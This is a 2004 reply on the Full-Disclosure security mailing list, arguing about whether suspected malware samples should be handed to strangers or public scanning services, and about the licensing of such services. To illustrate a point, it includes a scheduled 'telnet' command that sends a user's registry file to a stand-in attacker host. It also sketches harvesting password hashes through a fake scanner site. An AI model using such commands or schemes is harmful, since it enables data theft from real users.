Re: win2kup2date.exe ?

[James Tucker <jftucker () gmail com>]

On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey
<keydet89 () yahoo com> wrote:
> James,
>
> I'm replying off-list for the simple fact that I can't
> believe the post you sent to FD.  Your questions back
> to Nick are...well, what's the right word???...it's as
> if you're not even paying attention.

Apologies I will try to explain myself. I am sending this back to the
list, as it is obvious that my meaning was not clear, and there may be
some points to be learned by others also. Thank you for pointing this
out to me.

> > > > ...  If you want to email me a copy of it, I'll
> > > > rip it apart and see what can be seen.
> > >
> > > And world plus dog should entrust you with such
> > material because???
> > ... most viruses, trojans and malware to not store
> > copies of stolen
> > data in their executables. Furthermore the file size
> > is very small.
>
> Interesting answer, but completely non-sequitor.  Nick
> asked why this person should be trusted with a live
> bit of malware, and your response is that it's not
> very big???  What does that have to do with anything?

Malware and viruses are VERY readily available in many places accross
the internet. Therefore this point should be of no concern. The only
other concern which may be important is the possibility that the
binary is carrying data from the infected system; it was this that I
was refering to. Please accept my apology for not making this clearer.

 
> > > P.S. Send it to [...] - it's my "catch all" for
> > > > virus/unknown files. Just be sure to ZIP it up
> > or else the web host
> > > > won't let it through. Otherwise I have disabled
> > all checks/scan.
> > > > Downloads directly to a secured Linux box.
> > >
> > > That's all very nice, but alone, far from the
> > makings of someone to
> > > entrust arbitrary, suspected malware samples to.
> >
> > "Entrust", just what exactly are you thinking you
> > might be giving away?
>
> Well, it's pretty obvious...a live bit of malware.
> It's really pretty obvious what Nick's getting
> at...why send this malware to some arbitrary person?
> Who's to say that he's going to use it as he says, and
> not send it back out to someone else?

To what end? It would be much more useful to an attacker to go and
collect and customise one of the many readily available trojans on the
internet, rather than spreading malware which they have no control
over. IMHO your concern is closer to cynicism than practical reality.


> > Again, you suspect allot of deception here, and
> > while it is of course
> > possible you are correct, I have yet to see this
> > ever done in practice.
>
> You haven't seen deception in practice...in general,
> or specifically in the case of VirusTotal?

If the virus was carrying data from the local system, and some hackers
had set up a fake site of the VirusTotal sort, this would be a
sophisticated way of decieving "security pros" into passing out
details. It would be easily possible to carry all of their password
hashes, for example, if any of them run VPNs this would be a near
instant release of access passwords (an army of several hundred
zombies could decode all the LM hashes in minutes).

 
> > Samples of non-data carrying viruses or
> > trojans are of
> > little use to anyone other than Anti-Virus firms, as
> > it is easy to
> > collect raw source for most if one is so inclined.
>
> Really?  Are you able to do so?  I would submit that
> many with malicious intent don't know the sites and
> sources you seem to be aware of, and will actually ask
> for the binary...for the purpose of releasing it
> against someone else.  Non-data carrying or otherwise,
> it doesn't matter.  I received several IMs just this
> weekend in which I was asked for running viruses.

Well, the same lack of trust may be given to you. In order find a
balence between proving my point and not providing you with up to date
info, I will provide you with this (http://vx.netlux.org/) site as an
example, which is not carrying any modern sources at this time. You
can find these easily by trawling security sites of high standards,
they have outbound links to such sites. Google is rarely your freind
in this regard, which may be why you are not aware of the high
numeracy of such sites on the internet. Needless to say that this lack
of awareness is possibly a good thing for most people (read: reduces
script-kiddie access to such data).

 
> > I agree that it is unlikely they have sufficient
> > client licenses to
> > provide such a service; however I can see that there
> > are a great deal
> > of arguments in law about how their case may be won.
>
> If a product is used in a manner for which it is not
> sufficiently or correctly licensed, how can one then
> use the law to win their case?  After all, it wouldn't
> be "their" (ie, VirusTotal's) case...it would be a
> case brought against them by the vendor.

I am not a lawyer, but I have seen cases won due to lack of definition
of a license. In this case the argument I gave is not contradicted by
any of the licenses involved as far as I can see. As I said though, I
am not a lawyer.

> > They may for
> > example only be required to carry one license, they
> > could argue that
> > they are simply allowing users to deliberately
> > infect their systems,
> > and making portions of the logs publicly available.
>
> That does make any sense at all...if they are required
> to carry only one license, then their copy of the
> product would be sufficiently licensed, and any case
> brought against them would be over before it started.

My point exactly, until the case is brought into a court room it is
probably one of the lesser defined scenarios under current
interpretation of law.


> > If there are viruses which commonly copy target
> > system data, or
> > sensitive data into their binaries at the present
> > time (I imagine the
> > mention of this deception may well spring at least
> > one such virus)
> > then I apologise that I am not aware of it.
>
> Does it matter exactly what the malicious code does?

In this case the deception could be very serious as capturing the
password details of a security professional is arguably more
"interesting" and might (possibly) be more valuable to an attacker.
This would be a good deceptive method of doing so.

As to whether generically it matters what a virus does, no, of course
if a virus is defined as being such, it is malicious and should be
removed anyway.

Sometimes it is important to know its functionality, as what if it had
secretly run a  command like:
at 18:30 "echo ntuser.dat | telnet haxorsite.com:1337"

The antivirus program would remove the virus, but your registry data
would still get sent to the hacker site as this data is not illegal in
the system. Before anyone has a go at me over access to ntuser.dat /
timing issues / whatever, this is concept example only; use your heads
please.

> > There is always no need for aggressive statement of
> > suspicion, which you are close to here.
> > While I understand aggression due to anger, I
> > am concerned that one should not get angry at
> > someone offering them a
> > service merely because one is suspicious of them.
> > What if the offer of help is entirely genuine?
>
> I think that you're entirely missing the point, as
> I've already pointed out.

I apologise that this message of mine was not as clear as it should
have been. Thank you for pointing it out to me.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html